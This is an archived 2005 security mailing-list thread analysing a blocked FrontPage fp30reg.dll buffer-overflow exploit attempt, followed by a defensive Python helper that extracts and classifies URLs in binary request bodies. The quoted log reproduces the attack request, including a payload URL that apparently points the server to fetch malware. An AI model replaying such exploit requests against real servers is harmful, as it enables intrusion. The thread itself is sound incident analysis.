[WEB SECURITY] Frontpage Exploit - Strange POST Payload

Ryan Barnett rcbarnett at gmail.com
Tue Jun 21 14:29:43 EDT 2005


Yeah, that is the same vulnerability I included from the OVDB link.  I
know that the buffer overflow vulnerability has been around for
a while, however I have not seen this exploit payload before.

I had a brief email conversation with a colleague earlier today about
this.  The use of the internal IP address range along with a port
number could indicate a possible vector for internal host/port
scanning.  The only problem with this theory is that there was only
one request.  If there were numerous requests for more hosts or ports,
then this would seem more plausible.

Not quite sure what they were trying to accomplish with this one...

-- 
Ryan C. Barnett
Web Application Security Consortium (WASC) Member
CIS Apache Benchmark Project Lead
SANS Instructor: Securing Apache
GCIA, GCFA, GCIH, GSNA, GCUX, GSEC


On 6/21/05, Chris Weber <chris at lookout.net> wrote:
> Not answering your questions specifically but this looks like an attempt to
> exploit a pretty old vulnerability announced in MS03-051.
> 
> http://www.securiteam.com/windowsntfocus/6M00B0K8UE.html
> 
> 
> 
> -----Original Message-----
> From: Ryan Barnett [mailto:rcbarnett at gmail.com]
> Sent: Tuesday, June 21, 2005 7:20 AM
> To: Web Security
> Subject: [WEB SECURITY] Frontpage Exploit - Strange POST Payload
> 
> I received a Frontpage exploit
> (http://www.osvdb.org/displayvuln.php?osvdb_id=2952&Lookup=Lookup)
> attempt yesterday.  I get these types of probes all the time (as I am sure
> most of you do as well).  I normally filter these requests as I am not using
> Frontpage.  The reason that I took a look at this particular request log is
> that it triggered a Shellcode sig in Snort.
> 
> Since there was some binary data in the request, I piped it through strings.
> Here is the log entry -
> 
> ========================================
> Request: 66.161.76.150 - - [20/Jun/2005:23:31:11 --0400] "POST
> /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 403 743
> Handler: cgi-script
> ----------------------------------------
> POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1
> Host: 199.196.145.215
> Transfer-Encoding: chunked
> Content-Length: 1499
> mod_security-message: Access denied with code 403. Pattern match
> "/fp30reg\.dll" at THE_REQUEST
> mod_security-action: 403
> 1499
> Ehttp://10.10.2.2:191/lsd
> 080/lsd
> ,0F4
> %**f
> 
> HTTP/1.1 403 Forbidden
> ========================================
> 
> What was interesting was the POST payload of the request, specifically the
> URL - http://10.10.2.2:191/lsd.  Has anyone else seen this before?  Three
> questions that I have when looking at this -
> 
> 1) This appears to be an attempt to have my vulnerable server download
> something from a remote website.  If this is so, why the use of the
> non-routable IP address (10.10.X.X)?  My server wouldn't be able to get to
> the attacker's site...
> 
> 2) What about the use of port 191?  This port seems to be related to the
> propero service (by Cliff Neuman).  Does anyone know of any trojans that use
> this port?
> 
> 3) I am assuming that "/lsd" URI is a file for some form of malware.
> 
> Let me know if you have any insight into this exploit attempt.
> 
> Thanks.
> 
> --
> Ryan C. Barnett
> Web Application Security Consortium (WASC) Member
> CIS Apache Benchmark Project Lead
> SANS Instructor: Securing Apache
> GCIA, GCFA, GCIH, GSNA, GCUX, GSEC
> 
> ---------------------------------------------------------------------
> The Web Security Mailing List
> http://www.webappsec.org/lists/websecurity/
> 
> The Web Security Mailing List Archives
> http://www.webappsec.org/lists/websecurity/archive/
> 
>
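A small triage helper for this kind of probe, added here as an example and not code from either message: it mimics the `strings` pass described above, pulls any URL out of the binary POST body, and flags hosts in private address space (the sample body is constructed to resemble the log excerpt, not the captured bytes).

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample body modelled on the payload in the post above (not the
# original bytes): binary filler around the embedded URL and the "080/lsd" run.
SAMPLE_BODY = (
    b"\x00\x01\x02Ehttp://10.10.2.2:191/lsd\x00\x90\x90\x90"
    b"080/lsd\x00\xff,0F4\x00%**f\x00"
)

MIN_RUN = 4  # minimum run length, the same default the `strings` utility uses


def printable_strings(data, min_run=MIN_RUN):
    """Return runs of printable ASCII at least min_run bytes long, like `strings`."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_run, data)]


URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def embedded_urls(data):
    """Extract http(s) URLs from the printable runs inside a binary request body."""
    urls = []
    for run in printable_strings(data):
        urls.extend(URL_RE.findall(run))
    return urls


def classify_url(url):
    """Describe where a URL points: host, port, path, and whether the host is routable."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    port = parts.port or (443 if parts.scheme == "https" else 80)
    try:
        is_ip, non_routable = True, ipaddress.ip_address(host).is_private
    except ValueError:  # hostname rather than a literal address
        is_ip, non_routable = False, False
    return {"url": url, "host": host, "port": port, "path": parts.path,
            "is_ip": is_ip, "non_routable": non_routable}


def triage(body):
    """List every URL embedded in the body; a private (RFC 1918) target is one the
    victim server could never fetch from, which argues against a real download stage."""
    return [classify_url(u) for u in embedded_urls(body)]


if __name__ == "__main__":
    for finding in triage(SAMPLE_BODY):
        print(finding)
```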
